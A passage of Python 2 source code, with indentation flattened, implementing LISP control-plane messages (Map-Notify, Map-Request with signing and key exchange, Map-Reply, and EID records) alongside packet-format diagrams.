lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
red(itr.print_address_no_iid(), False),
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
lcaf_len, json_len)
packet += json_string
packet += struct.pack("H", 0)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
try:
json_string = json.loads(packet[0:json_len])
except:
return(None)
#endtry
packet = packet[json_len::]
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
while (self.itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = socket.ntohs(afi)
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
else:
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
